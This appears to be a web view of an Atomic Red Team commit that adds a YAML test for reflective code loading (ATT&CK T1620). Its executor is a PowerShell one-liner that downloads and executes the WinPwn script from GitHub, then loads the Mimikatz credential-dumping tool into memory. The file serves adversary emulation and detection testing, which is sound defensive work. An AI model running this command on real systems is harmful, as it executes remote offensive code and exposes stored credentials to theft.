security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1620 - Reflective Code Loading (#1959)

Browse Source 
* Create T1620.yaml

* Update T1620.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
tlor89
2022-05-12 17:44:05 -05:00
committed by GitHub
parent 0a82610b35
commit e7d9f85159
1 changed files with 13 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1620/T1620.yaml
+13
View File
@@ -0,0 +1,13 @@
attack_technique: T1620
display_name: "Reflective Code Loading"
atomic_tests:
- name: WinPwn - Reflectively load Mimik@tz into memory
description: Reflectively load Mimik@tz into memory technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
mimiload -consoleoutput -noninteractive
name: powershell